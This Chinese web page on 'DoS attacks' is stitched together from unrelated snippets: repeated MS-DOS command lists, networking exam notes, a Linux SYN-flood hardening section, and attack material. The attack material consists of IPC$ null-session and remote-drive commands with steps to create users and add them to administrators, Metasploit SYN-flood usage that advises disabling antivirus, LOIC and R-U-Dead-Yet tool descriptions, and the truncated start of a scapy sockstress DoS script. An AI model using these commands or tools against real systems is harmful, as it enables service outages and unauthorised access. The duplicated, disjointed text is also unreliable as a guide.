dos攻击

Dos命令大全（1） https://www.cnblogs.com/jokerjason/p/7505071.html MS DOS 命令大全一、基础命令 1 dir 无参数：查看当前所在目录的文件和文件夹。 /s：查看当前目录已经其所有子目录的文件和文件夹。 /a：查看包括隐含文件的所有文件。 /ah：只显示出隐含文件。 /w：以紧凑方式（一行显示5个文件）显示文件和文件夹。 /p：以分页方式（显示一页之后会自动暂停）显示。 |more：前面那个符号是“\”上面的那个，叫做重定向符号，就是把一个 命令的结果输出为另外一个命令的参数。more也是一个命令，dir /w |more 得到的结果和dir /w /p的结果是一样的。 其他的参数大家可以用：dir/?查看。 2 cd cd 目录名：进入特定的目录。如果看到有个目录显示为：abcdef ghi 就 输入：cdabcdef.ghi进入该目录。 cd\ 退回到根目录。 cd..退回到上一级目录。 3 md rd md 目录名：建立特定的文件夹。 （dos下面习惯叫目录，win下面习惯叫文 件夹。呵呵！） rd 目录名：删除特定的文件夹。 4 cls 清除屏幕。 5 copy copy 路径\文件名 路径\文件名 ：把一个文件拷贝到另一个地方。 6 move move 路径\文件名 路径\文件名 ：把一个文件移动（就是剪切+复制

未来教育选择题知识点（真题） 1.ipv6地址简化 使用双冒号法表示时，双冒号只允许出现一次 使用零压缩法时，不能把一个位段内部的有效0也压缩掉 ipv6不支持子网掩码，只支持前缀表示法 2.Catalyst6500配置IP地址 set interface sc0 3.数据备份的恢复速度 从快到慢依次是完全备份、差异备份、增量备份 4.PIX 525防火墙 监视模式可以进行操作系统映像更新和口令恢复 5.网络防火墙可以阻断DOS攻击 常见DOS攻击：Smurf攻击、SYN Flooding、分布式拒绝服务攻击(DOS)、Ping of Death、Tear doop和Land攻击 6.用于检测本机配置的域名服务器是否正常工作的命令 pathping 来源： https://www.cnblogs.com/fanzy1103/p/12329701.html

#1 一： net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: net use h: \\ip\c$ 登陆后映射对方C：到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名　密码　/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名　 开启服务；(如:net start telnet， net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与"目标IP"主机的时间同步

1.utilman--------辅助工具 2.nslookup-------IP地址侦测器 3.explorer-------打开资源管理器 4.logoff---------注销命令 5.services---------用来启动、终止并设置 Windows 服务 6.notepad--------打开记事本 7.cleanmgr-------磁盘垃圾清理 8.dvdplay--------多媒体 9.charmap--------启动字符映射表 10.diskmgmt.msc—磁盘管理实用程序 11.calc-----------启动计算器 12.devmgmt— 设备管理器 13.regsvr32 /u .dll----停止dll文件运行 14.drwtsn32------ 系统医生 15.dxdiag---------检查DirectX信息 16.msconfig.exe—系统配置实用程序 17.write----------写字板 18.mspaint--------画图板 19.perfmon.msc----计算机性能监测程序 20.winver---------检查Windows版本 21.wscript--------windows脚本宿主设置 22.wiaacmgr-------扫描仪和照相机向导 23.osk------------打开屏幕键盘 24

一、基础命令 1 dir 无参数：查看当前所在目录的文件和文件夹。 /s：查看当前目录已经其所有子目录的文件和文件夹。 /a：查看包括隐含文件的所有文件。 /ah：只显示出隐含文件。 /w：以紧凑方式（一行显示5个文件）显示文件和文件夹。 /p：以分页方式（显示一页之后会自动暂停）显示。 |more：前面那个符号是“\”上面的那个，叫做重定向符号，就是把一个 命令的结果输出为另外一个命令的参数。more也是一个命令，dir /w |more 得到的结果和dir /w /p的结果是一样的。 其他的参数大家可以用：dir/?查看。 2 cd cd 目录名：进入特定的目录。如果看到有个目录显示为：abcdef ghi 就 输入：cdabcdef.ghi进入该目录。 cd\ 退回到根目录。 cd..退回到上一级目录。 3 md rd md 目录名：建立特定的文件夹。 （dos下面习惯叫目录，win下面习惯叫文 件夹。呵呵！） rd 目录名：删除特定的文件夹。 4 cls 清除屏幕。 5 copy copy 路径\文件名 路径\文件名 ：把一个文件拷贝到另一个地方。 6 move move 路径\文件名 路径\文件名 ：把一个文件移动（就是剪切+复制）到另 一个地方。 7 del del 文件名：删除一个文件。 del *.*：删除当前文件夹下所有文件。 del不能删除文件夹。 8

进入DOS命令窗口快捷方式：win + R 一、基础命令 1 dir 无参数：查看当前所在目录的文件和文件夹。 /s：查看当前目录已经其所有子目录的文件和文件夹。 /a：查看包括隐含文件的所有文件。 /ah：只显示出隐含文件。 /w：以紧凑方式（一行显示5个文件）显示文件和文件夹。 /p：以分页方式（显示一页之后会自动暂停）显示。 |more：前面那个符号是“\”上面的那个，叫做重定向符号，就是把一个 命令的结果输出为另外一个命令的参数。more也是一个命令，dir /w |more 得到的结果和dir /w /p的结果是一样的。 其他的参数大家可以用：dir/?查看。 2 cd cd 目录名：进入特定的目录。如果看到有个目录显示为：abcdef ghi 就 输入：cdabcdef.ghi进入该目录。 cd\ 退回到根目录。 cd..退回到上一级目录。 3 md rd md 目录名：建立特定的文件夹。 （dos下面习惯叫目录，win下面习惯叫文 件夹。呵呵！） rd 目录名：删除特定的文件夹。 4 cls 清除屏幕。 5 copy copy 路径\文件名 路径\文件名 ：把一个文件拷贝到另一个地方。 6 move move 路径\文件名 路径\文件名 ：把一个文件移动（就是剪切+复制）到另 一个地方。 7 del del 文件名：删除一个文件。 del *.*

1.软件下载 http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe https://pan.baidu.com/s/1VBnAiqJEk4GO-zRYnmO_RQ 2.安装 注意：安装时关闭杀毒软件和防火墙 3.安装完后就直接在安装目录打开msfconsole.bat 中间过程可能有点慢不要着急，稍微等一会就能打开了。 简单使用举例：tcp syn攻击 进入目录msf5 > use auxiliary/dos/tcp/synflood 根据实际情况设置ip和端口以及一些其他信息，设置完直接run就可以了 来源： CSDN 作者： NewSunRise 链接： https://blog.csdn.net/ak66366/article/details/104071546

拒绝服务攻击 即是攻击者想办法让目标机器停止给予服务，常是网络黑客用的主动攻击手段之一。其实对服务器带宽进行的消耗性主动攻击只是拒绝服务攻击的一小部分，只需能够对目标造成麻烦，使某些服务被暂停甚至主机死机， 都归属于拒绝服务攻击 。 LOICdos主动攻击小工具 LOIC 最初是一款网络服务器压力测试工具，最初有Praetox科技，能够通过TCP和UDP flood方式形成DOS(拒绝服务攻击)，测试方法网络服务器的性能。 首先选择目标IP地址(select your target)，然后主动攻击选项（Attack option） 中有多种方法： 直接用TCP 或者UDP 就可以了，效果非常明显。 TCP是 上传TCP洪水攻击 ，主要是 消耗网络服务器的资源 ，这种主动攻击，应该说这种压测，之前需要扫描服务器端口，针对端口号进行TCP flood。 UDP归属于强奸型的，杀敌一千，自损八百，就看测试者和网络服务器谁的性能，带宽更高，说白了就是拼资源。 压测下，网络服务器开始 出现时延增大和丢包 备注：LOIC是上传报文时，源地址没有进行假造，是真实的IP地址，能够通过抓包查看。 相关推荐文章《 防火墙等于查杀木马工具吗？ linux与windows系统如何操作？ 》 LINUX:r-u-dead-yet dos主动攻击小工具 R-U-Dead-Yet是一款采用慢速HTTP

问题 Linux系统防火墙防止DOS攻击 解决方案 用Linux系统防火墙功能抵御网络攻击 虚拟主机服务商在运营过程中可能会受到黑客攻击，常见的攻击方式有SYN，DDOS等。 通过更换IP，查找被攻击的站点可能避开攻击，但是中断服务的时间比较长。比较彻底 的解决方法是添置硬件防火墙。不过，硬件防火墙价格比较昂贵。可以考虑利用Linux 系统本身提供的防火墙功能来防御。 1. 抵御SYN SYN攻击是利用TCP/IP协议3次握手的原理，发送大量的建立连接的网络包，但不实际 建立连接，最终导致被攻击服务器的网络队列被占满，无法被正常用户访问。 Linux内核提供了若干SYN相关的配置，用命令： sysctl -a | grep syn 看到： net.ipv4.tcp_max_syn_backlog = 1024 net.ipv4.tcp_syncookies = 0 net.ipv4.tcp_synack_retries = 5 net.ipv4.tcp_syn_retries = 5 tcp_max_syn_backlog是SYN队列的长度，tcp_syncookies是一个开关，是否打开SYN Cookie 功能，该功能可以防止部分SYN攻击。tcp_synack_retries和tcp_syn_retries定义SYN 的重试次数。

为了证明我还活着，话不多说 Dos攻击脚本（这是一个sockstrees Dos脚本） 1 #-*- coding:utf-8 -*- 2 from scapy.all import * 3 from time import sleep 4 import thread 5 import logging 6 import os 7 import signal 8 import sys 9 10 from scapy.layers.inet import IP,TCP 11 12 logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 13 14 if len(sys.argv) != 4: 15 print("用法： ./sock_stress.py [目标IP] [端口] [线程数]") 16 print("举例： ./scok_stress.py [1.1.1.1] 20 ##攻击端口处于开放状态") 17 sys.exit() 18 19 target = str(sys.argv[1]) 20 dstport = int(sys.argv[2]) 21 threads = int(sys.argv[3]) 22 23 ##攻击函数 24 def sock_stress(target,dstport): 25